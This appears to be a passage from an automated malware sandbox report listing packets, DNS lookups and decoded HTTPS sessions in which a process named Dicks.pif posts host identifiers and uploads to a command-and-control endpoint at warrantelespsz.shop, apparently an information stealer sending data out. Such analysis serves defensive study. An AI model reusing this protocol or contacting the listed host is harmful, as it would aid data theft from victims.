                                            Jul 25, 2024 09:54:13.995855093 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.997088909 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.997122049 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:13.997133970 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.997468948 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:13.997509003 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.011697054 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:14.012449026 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.012486935 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:14.012506962 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.012526035 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.012638092 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.012672901 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.015131950 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:14.015609026 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:14.015640020 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:15.433077097 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:15.433341026 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:15.433417082 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:15.433486938 CEST49728443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:15.433507919 CEST44349728188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:15.479137897 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:15.479186058 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:15.479260921 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:15.479578018 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:15.479595900 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:17.088196039 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:17.088274002 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:17.090003014 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:17.090015888 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:17.090269089 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:17.091931105 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:17.091964960 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:17.092015982 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:18.413511038 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:18.413635015 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:18.413717031 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:18.413966894 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:18.413980961 CEST44349729188.114.96.3192.168.2.6
                                            Jul 25, 2024 09:54:18.414011955 CEST49729443192.168.2.6188.114.96.3
                                            Jul 25, 2024 09:54:18.414017916 CEST44349729188.114.96.3192.168.2.6
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 25, 2024 09:53:07.666429996 CEST5727353192.168.2.61.1.1.1
                                            Jul 25, 2024 09:53:07.810509920 CEST53572731.1.1.1192.168.2.6
                                            Jul 25, 2024 09:54:05.127075911 CEST5374353192.168.2.61.1.1.1
                                            Jul 25, 2024 09:54:05.140547991 CEST53537431.1.1.1192.168.2.6
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jul 25, 2024 09:53:07.666429996 CEST192.168.2.61.1.1.10xe554Standard query (0)fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPhA (IP address)IN (0x0001)false
                                            Jul 25, 2024 09:54:05.127075911 CEST192.168.2.61.1.1.10x4e9bStandard query (0)warrantelespsz.shopA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 25, 2024 09:53:07.810509920 CEST1.1.1.1192.168.2.60xe554Name error (3)fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPhnonenoneA (IP address)IN (0x0001)false
                                            Jul 25, 2024 09:54:05.140547991 CEST1.1.1.1192.168.2.60x4e9bNo error (0)warrantelespsz.shop188.114.96.3A (IP address)IN (0x0001)false
                                            Jul 25, 2024 09:54:05.140547991 CEST1.1.1.1192.168.2.60x4e9bNo error (0)warrantelespsz.shop188.114.97.3A (IP address)IN (0x0001)false
                                            • warrantelespsz.shop
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.649722188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:05 UTC266OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 8
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                            Data Ascii: act=life
                                            2024-07-25 07:54:06 UTC802INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=gao4lftnno5n4t3jionpio85do; expires=Mon, 18-Nov-2024 01:40:45 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPgP7KsTbLd%2Fmn7SbU4Iwc4WJPx6mqpPFouXH%2F4CmXLOIOBv%2BgiENfDGHpxgyiksbyuEOvpM53bqYBmfRxRg9lCWNqtuR8gRZc5a6JblvO%2FBojeQc7705ClaYijNKjWQ2c7PdTJb"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a947b89bac327-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                            Data Ascii: 2ok
                                            2024-07-25 07:54:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.649723188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:06 UTC267OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 42
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:06 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 6c 67 59 39 69 2d 2d 26 6a 3d
                                            Data Ascii: act=recive_message&ver=4.0&lid=DlgY9i--&j=
                                            2024-07-25 07:54:07 UTC796INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=uejicjiufr9qjmair0fu3n00n7; expires=Mon, 18-Nov-2024 01:40:46 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U5ny83157LDcfmIayucpbXpH4B8Z6b9HjjETP5RGUIy1QHhWM8hnhLvlEeLQkvT9DIXYuihKvhvASfV9m6mhjTqkjwVFeiZmdRRAwSoO%2F1tEsAqsBUOhmG6fQQfHw8gMEuY8bMiQ"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a9481197a424c-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:07 UTC573INData Raw: 34 32 32 30 0d 0a 6b 31 6d 68 6e 6c 31 39 47 41 43 47 69 2b 43 49 66 69 62 31 69 4a 53 37 59 56 64 43 6b 37 6a 63 45 57 49 51 73 4a 4d 77 36 46 72 6f 65 39 65 38 5a 30 6b 30 49 76 58 75 77 72 49 4b 56 49 44 74 75 4a 6b 41 4d 32 43 70 33 72 31 39 45 58 57 63 73 55 61 46 65 4b 6b 2f 77 50 49 75 47 44 51 69 34 2f 50 43 73 69 56 64 31 2b 33 36 6d 56 74 31 4a 2f 6e 61 76 58 30 41 63 64 76 38 51 49 51 35 2b 7a 58 47 39 6a 67 65 66 47 48 71 35 6f 58 74 47 30 65 66 35 76 33 57 43 54 70 67 76 35 71 35 61 30 41 71 6b 74 35 56 6e 44 76 65 4f 4e 4c 31 66 77 41 30 65 36 54 75 6a 71 70 45 42 4a 54 74 39 74 63 48 4d 79 6e 37 30 4c 52 31 41 58 54 61 34 31 6d 4f 4d 76 73 37 78 66 63 79 46 32 68 73 34 4f 47 4f 36 78 46 48 31 36 53 32 33 68 74 31 65 4c 47 4a 6a 48 41 52 59
                                            Data Ascii: 4220k1mhnl19GACGi+CIfib1iJS7YVdCk7jcEWIQsJMw6Froe9e8Z0k0IvXuwrIKVIDtuJkAM2Cp3r19EXWcsUaFeKk/wPIuGDQi4/PCsiVd1+36mVt1J/navX0Acdv8QIQ5+zXG9jgefGHq5oXtG0ef5v3WCTpgv5q5a0Aqkt5VnDveONL1fwA0e6TujqpEBJTt9tcHMyn70LR1AXTa41mOMvs7xfcyF2hs4OGO6xFH16S23ht1eLGJjHARY
                                            2024-07-25 07:54:07 UTC1369INData Raw: 32 7a 50 4e 63 51 35 75 71 72 70 6b 4e 4d 43 2f 6a 32 36 78 32 44 6d 44 65 39 46 53 48 4f 2f 38 37 78 76 73 79 45 58 78 6c 35 2b 47 47 36 78 4a 49 6e 65 6e 79 32 6b 4e 37 59 50 62 43 2f 69 74 41 51 39 48 31 56 5a 67 37 2f 33 76 63 73 69 5a 66 66 57 36 6b 73 63 4c 67 47 6b 6d 65 34 66 48 52 44 79 63 72 2f 74 6d 33 64 41 5a 34 30 66 6c 59 6a 44 62 77 50 4d 62 37 4c 52 46 78 62 2b 66 6a 68 4b 70 53 42 4a 44 79 74 6f 46 44 47 79 50 67 7a 49 78 77 45 57 4f 53 37 68 79 54 65 50 59 33 67 36 52 2f 46 6e 4a 74 36 65 53 49 35 42 6c 4a 6e 75 76 33 31 41 55 2b 49 66 6e 53 75 6e 51 41 64 74 2f 2b 58 49 6f 32 2b 54 37 48 39 6a 5a 66 4e 43 4c 6a 38 63 4b 79 58 48 53 61 35 76 33 56 51 51 41 6a 2f 39 53 35 5a 55 42 74 6e 4f 67 53 6a 54 53 78 59 34 50 75 4e 42 4a 37 62 50
                                            Data Ascii: 2zPNcQ5uqrpkNMC/j26x2DmDe9FSHO/87xvsyEXxl5+GG6xJIneny2kN7YPbC/itAQ9H1VZg7/3vcsiZffW6kscLgGkme4fHRDycr/tm3dAZ40flYjDbwPMb7LRFxb+fjhKpSBJDytoFDGyPgzIxwEWOS7hyTePY3g6R/FnJt6eSI5BlJnuv31AU+IfnSunQAdt/+XIo2+T7H9jZfNCLj8cKyXHSa5v3VQQAj/9S5ZUBtnOgSjTSxY4PuNBJ7bP
                                            2024-07-25 07:54:07 UTC1369INData Raw: 58 45 4f 50 71 71 36 5a 4e 53 55 74 2f 66 53 31 66 77 6b 79 7a 62 39 4c 79 6a 2f 39 65 35 75 38 4f 78 4e 79 61 4f 76 67 69 4f 41 54 54 5a 66 69 2f 39 41 41 4e 53 7a 33 32 37 4a 2f 44 58 66 52 39 46 2b 50 4f 50 30 38 78 50 31 2f 55 54 70 6c 2f 4b 6e 61 71 69 78 4a 6d 2b 48 36 6d 7a 59 32 4c 76 2f 64 71 44 4d 66 50 4d 75 78 56 59 5a 34 71 58 76 4d 2f 54 49 56 63 57 7a 6f 36 49 4c 75 48 30 36 58 35 66 50 66 43 7a 77 67 34 39 32 78 63 67 46 35 32 66 78 63 6a 7a 6e 30 50 49 4f 79 66 78 68 69 49 72 79 70 72 38 4d 6d 42 49 69 6b 37 35 6b 45 4f 57 43 70 6d 72 70 35 41 48 2f 59 2b 6c 32 4a 50 2f 38 37 7a 76 59 74 46 33 70 69 36 75 2b 44 35 68 6c 46 6d 2b 6e 6b 31 51 55 34 4a 76 6e 49 2f 6a 31 41 64 63 71 78 43 73 6f 59 2b 6a 66 41 38 44 34 59 4f 45 50 75 36 6f 6e
                                            Data Ascii: XEOPqq6ZNSUt/fS1fwkyzb9Lyj/9e5u8OxNyaOvgiOATTZfi/9AANSz327J/DXfR9F+POP08xP1/UTpl/KnaqixJm+H6mzY2Lv/dqDMfPMuxVYZ4qXvM/TIVcWzo6ILuH06X5fPfCzwg492xcgF52fxcjzn0PIOyfxhiIrypr8MmBIik75kEOWCpmrp5AH/Y+l2JP/87zvYtF3pi6u+D5hlFm+nk1QU4JvnI/j1AdcqxCsoY+jfA8D4YOEPu6on
                                            2024-07-25 07:54:07 UTC1369INData Raw: 2b 54 78 31 77 38 37 4c 66 76 5a 73 7a 4e 4f 4d 74 58 70 45 74 4a 34 33 54 7a 4f 30 6a 51 54 66 53 4c 37 70 35 75 71 47 30 6a 58 73 72 62 56 43 54 6b 70 38 64 4f 37 65 77 74 37 31 2f 42 5a 6a 7a 76 33 4e 73 7a 31 4c 52 56 35 62 4f 66 6c 6a 75 77 64 52 34 58 69 2f 35 6c 4e 64 53 66 70 6d 75 59 7a 49 58 7a 66 35 56 57 61 65 4f 35 31 32 72 77 34 45 7a 6f 36 70 4f 71 44 35 52 39 46 6d 75 7a 2f 30 51 4d 7a 4a 66 37 58 73 48 51 48 63 74 2f 2f 58 59 77 77 2f 44 66 49 38 6a 59 5a 65 6d 50 75 71 63 79 71 47 31 7a 58 73 72 62 70 41 44 55 67 36 70 71 68 50 52 6b 79 31 66 30 53 30 6e 6a 6a 4d 63 72 38 50 42 42 39 5a 75 2f 6c 68 2b 38 54 52 35 37 76 2f 39 63 52 50 43 37 35 30 72 46 32 43 33 4c 66 2b 31 36 4b 4f 37 46 31 67 2f 73 6e 58 79 49 69 31 75 53 4f 2f 42 74 4c
                                            Data Ascii: +Tx1w87LfvZszNOMtXpEtJ43TzO0jQTfSL7p5uqG0jXsrbVCTkp8dO7ewt71/BZjzv3Nsz1LRV5bOfljuwdR4Xi/5lNdSfpmuYzIXzf5VWaeO512rw4Ezo6pOqD5R9Fmuz/0QMzJf7XsHQHct//XYww/DfI8jYZemPuqcyqG1zXsrbpADUg6pqhPRky1f0S0njjMcr8PBB9Zu/lh+8TR57v/9cRPC750rF2C3Lf+16KO7F1g/snXyIi1uSO/BtL
                                            2024-07-25 07:54:07 UTC1369INData Raw: 6f 4b 4d 69 6a 39 30 4c 31 30 51 44 79 53 39 6b 72 4b 59 4c 45 59 31 4f 77 79 58 32 55 73 2f 61 6d 46 35 6c 77 63 31 2b 4c 37 30 51 6b 78 4a 2f 7a 64 75 48 6f 53 65 39 66 2f 55 6f 34 7a 2f 6a 33 48 2f 7a 38 4e 66 47 62 73 36 6f 2f 6e 45 6b 65 54 71 72 69 5a 42 43 31 67 71 5a 71 4d 66 67 35 70 33 66 5a 44 67 48 6a 75 64 64 71 38 4f 42 4d 36 4f 71 54 74 6a 50 67 58 52 5a 7a 68 2b 4e 34 4d 4d 43 72 78 31 62 70 77 44 6e 6e 54 38 6c 71 48 4e 66 38 78 79 76 55 34 45 33 35 6c 70 4b 66 43 37 51 51 45 7a 36 72 64 2b 43 34 5a 4a 2b 75 61 6f 54 30 5a 4d 74 58 39 45 74 4a 34 2f 54 4c 50 39 6a 51 59 63 47 7a 74 35 34 6e 34 44 6b 65 54 36 66 2f 61 42 44 77 75 38 64 32 37 66 51 64 7a 32 66 56 59 69 54 36 78 64 59 50 37 4a 31 38 69 49 73 6a 71 67 75 63 47 42 49 69 6b 37
                                            Data Ascii: oKMij90L10QDyS9krKYLEY1OwyX2Us/amF5lwc1+L70QkxJ/zduHoSe9f/Uo4z/j3H/z8NfGbs6o/nEkeTqriZBC1gqZqMfg5p3fZDgHjuddq8OBM6OqTtjPgXRZzh+N4MMCrx1bpwDnnT8lqHNf8xyvU4E35lpKfC7QQEz6rd+C4ZJ+uaoT0ZMtX9EtJ4/TLP9jQYcGzt54n4DkeT6f/aBDwu8d27fQdz2fVYiT6xdYP7J18iIsjqgucGBIik7
                                            2024-07-25 07:54:07 UTC1369INData Raw: 79 38 74 57 78 64 77 42 39 31 50 64 54 68 54 37 32 4d 73 4c 30 4f 46 38 30 49 75 50 78 77 72 4a 63 61 70 44 70 38 70 6b 63 65 7a 6d 78 33 62 49 7a 57 44 4c 53 2b 31 69 41 4e 76 45 38 30 66 6f 32 48 33 6c 77 35 2b 2b 4b 37 42 42 49 6d 75 4c 2f 32 51 59 2b 4c 66 72 58 75 48 4d 4c 63 35 4b 2f 45 6f 30 67 73 57 4f 44 7a 54 49 52 66 6d 7a 6e 2b 59 57 71 41 77 71 4f 71 76 48 56 51 32 31 67 2f 74 4f 73 64 41 56 36 32 2f 46 63 67 7a 48 32 50 38 44 39 4f 78 4e 31 61 2b 66 68 67 2b 49 54 52 35 66 68 2f 74 4d 43 4f 79 57 78 6c 50 35 30 47 44 4b 4b 73 58 32 4a 50 66 6f 36 67 64 73 35 47 48 59 69 2b 36 65 62 71 68 74 49 31 37 4b 32 32 67 63 37 4b 66 37 65 74 48 51 41 64 64 54 78 57 6f 45 31 2b 69 6e 47 38 6a 6f 65 65 6d 50 72 35 59 4c 34 47 55 71 63 35 2f 4b 5a 54 58
                                            Data Ascii: y8tWxdwB91PdThT72MsL0OF80IuPxwrJcapDp8pkcezmx3bIzWDLS+1iANvE80fo2H3lw5++K7BBImuL/2QY+LfrXuHMLc5K/Eo0gsWODzTIRfmzn+YWqAwqOqvHVQ21g/tOsdAV62/FcgzH2P8D9OxN1a+fhg+ITR5fh/tMCOyWxlP50GDKKsX2JPfo6gds5GHYi+6ebqhtI17K22gc7Kf7etHQAddTxWoE1+inG8joeemPr5YL4GUqc5/KZTX
                                            2024-07-25 07:54:07 UTC1369INData Raw: 75 57 4e 43 58 4e 6e 6c 56 63 70 32 73 54 53 44 70 41 5a 66 4d 69 4c 62 70 38 4c 79 58 42 7a 58 33 2f 58 58 44 54 49 32 34 4a 65 51 64 41 5a 33 31 65 45 51 70 44 50 6c 50 49 4f 79 66 78 6b 36 4f 72 53 6e 77 75 34 4e 42 4d 2b 36 70 49 4a 57 5a 6e 65 68 69 4b 45 39 47 54 4c 45 73 51 72 59 64 72 45 70 67 36 52 2f 57 48 6c 77 39 75 2b 42 2f 42 38 44 71 64 54 31 7a 77 34 36 4b 2f 44 6b 67 46 30 4e 63 39 48 2f 45 4c 73 75 2f 43 76 41 2b 54 67 68 52 47 7a 6a 2f 59 58 6b 47 6b 54 58 70 4c 62 57 51 32 30 5a 73 5a 4c 2b 54 45 34 79 79 72 45 4b 79 67 33 79 4e 63 33 37 4b 51 34 33 51 66 4c 6b 6a 65 45 64 42 4e 6d 71 38 4a 6c 62 5a 57 36 78 33 71 38 7a 57 43 4b 41 71 67 66 5a 62 36 46 70 33 4c 49 6d 58 32 77 69 76 4c 76 4d 71 67 34 45 7a 36 71 78 31 77 34 30 49 2f 2f
                                            Data Ascii: uWNCXNnlVcp2sTSDpAZfMiLbp8LyXBzX3/XXDTI24JeQdAZ31eEQpDPlPIOyfxk6OrSnwu4NBM+6pIJWZnehiKE9GTLEsQrYdrEpg6R/WHlw9u+B/B8DqdT1zw46K/DkgF0Nc9H/ELsu/CvA+TghRGzj/YXkGkTXpLbWQ20ZsZL+TE4yyrEKyg3yNc37KQ43QfLkjeEdBNmq8JlbZW6x3q8zWCKAqgfZb6Fp3LImX2wivLvMqg4Ez6qx1w40I//
                                            2024-07-25 07:54:07 UTC1369INData Raw: 44 4c 74 76 78 4b 53 65 4b 6c 37 39 76 38 78 45 58 31 30 39 61 53 6c 35 42 74 46 67 66 72 37 31 53 49 32 4d 66 75 61 38 44 4d 47 4d 6f 71 6a 48 4d 6f 38 34 48 75 62 72 47 31 45 4c 7a 47 7a 75 64 44 31 55 6c 33 58 2f 4c 61 42 55 58 74 67 34 35 72 6d 4d 30 64 78 77 4f 4e 55 69 53 37 79 66 50 33 43 47 67 68 35 63 75 4c 71 76 4e 51 33 53 4a 48 74 37 4e 34 46 45 77 43 78 6c 50 35 38 51 43 72 72 73 52 72 4b 42 37 39 37 32 37 78 6e 58 30 39 68 36 75 65 46 2f 41 30 4a 73 76 33 31 79 51 55 32 59 4c 2b 61 75 44 4e 59 49 70 79 78 56 70 74 34 71 57 75 52 70 32 70 4d 4c 54 4b 32 39 73 7a 7a 58 46 4c 58 73 71 53 58 51 79 64 67 71 5a 72 35 63 42 4a 67 31 50 4a 45 69 58 2f 50 42 65 58 2f 4c 68 56 62 62 2f 54 75 76 4e 51 4a 52 35 6e 6b 38 63 38 53 64 57 36 78 31 66 34 72
                                            Data Ascii: DLtvxKSeKl79v8xEX109aSl5BtFgfr71SI2Mfua8DMGMoqjHMo84HubrG1ELzGzudD1Ul3X/LaBUXtg45rmM0dxwONUiS7yfP3CGgh5cuLqvNQ3SJHt7N4FEwCxlP58QCrrsRrKB79727xnX09h6ueF/A0Jsv31yQU2YL+auDNYIpyxVpt4qWuRp2pMLTK29szzXFLXsqSXQydgqZr5cBJg1PJEiX/PBeX/LhVbb/TuvNQJR5nk8c8SdW6x1f4r
                                            2024-07-25 07:54:07 UTC1369INData Raw: 4e 67 6d 6a 50 6c 4f 4d 4c 6e 66 54 39 71 62 2f 48 34 68 66 6f 69 65 71 44 37 38 63 6c 42 45 79 50 6e 32 66 34 39 51 47 71 53 71 52 4b 74 4b 76 6f 36 38 65 77 30 43 33 6c 6a 2f 38 6d 53 35 77 6c 56 6b 50 71 32 78 6b 30 73 59 4f 65 61 35 69 42 4f 4d 73 43 78 43 73 70 2f 2f 7a 62 43 2f 7a 45 63 61 48 44 69 36 70 54 70 57 33 71 70 33 76 33 4e 41 44 73 6d 2b 75 53 41 52 42 46 31 77 72 4e 30 69 53 37 79 65 34 32 38 4a 31 38 69 49 74 44 69 6c 75 6b 53 51 70 79 71 36 5a 63 61 64 54 61 78 67 75 30 39 51 47 43 53 71 52 4c 4e 4e 76 77 36 77 50 49 38 44 57 68 6b 35 2f 2b 42 72 53 4a 36 75 4f 6e 73 7a 77 6b 34 4c 4d 2f 6b 69 57 49 48 59 70 44 58 55 5a 77 37 73 58 57 44 35 48 39 48 4f 6b 33 6e 38 35 54 67 45 55 6a 58 39 62 6a 41 51 79 4e 67 71 59 6e 77 4d 78 49 79 69
                                            Data Ascii: NgmjPlOMLnfT9qb/H4hfoieqD78clBEyPn2f49QGqSqRKtKvo68ew0C3lj/8mS5wlVkPq2xk0sYOea5iBOMsCxCsp//zbC/zEcaHDi6pTpW3qp3v3NADsm+uSARBF1wrN0iS7ye428J18iItDilukSQpyq6ZcadTaxgu09QGCSqRLNNvw6wPI8DWhk5/+BrSJ6uOnszwk4LM/kiWIHYpDXUZw7sXWD5H9HOk3n85TgEUjX9bjAQyNgqYnwMxIyi


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.649724188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:08 UTC285OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 12854
                                            Host: warrantelespsz.shop
                                            2024-07-25 07:54:08 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
                                            2024-07-25 07:54:08 UTC814INHTTP/1.1 200 OK
                                            Date: Thu, 25 Jul 2024 07:54:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=hgmp7rr6gr821uh985sedenbs7; expires=Mon, 18-Nov-2024 01:40:47 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HeDXgzijKtwZbwiHzLN0CLwomqNpQ4ksm9x3%2Fiu8%2FbU%2BOl4Q%2FJPy2jMrEUKar4cCrlC3WOwVpnNGodaj%2FGgn%2BlraAErU%2FQ%2BsAajlZlS5f1JZyxELiMHob12wklC%2BlEI%2BlDT9pcfX"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a948a4f0f422f-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                            Data Ascii: eok 8.46.123.33
                                            2024-07-25 07:54:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.649725188.114.96.34433248C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 07:54:09 UTC285OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 15100
                                            Host: warrantelespsz.shop
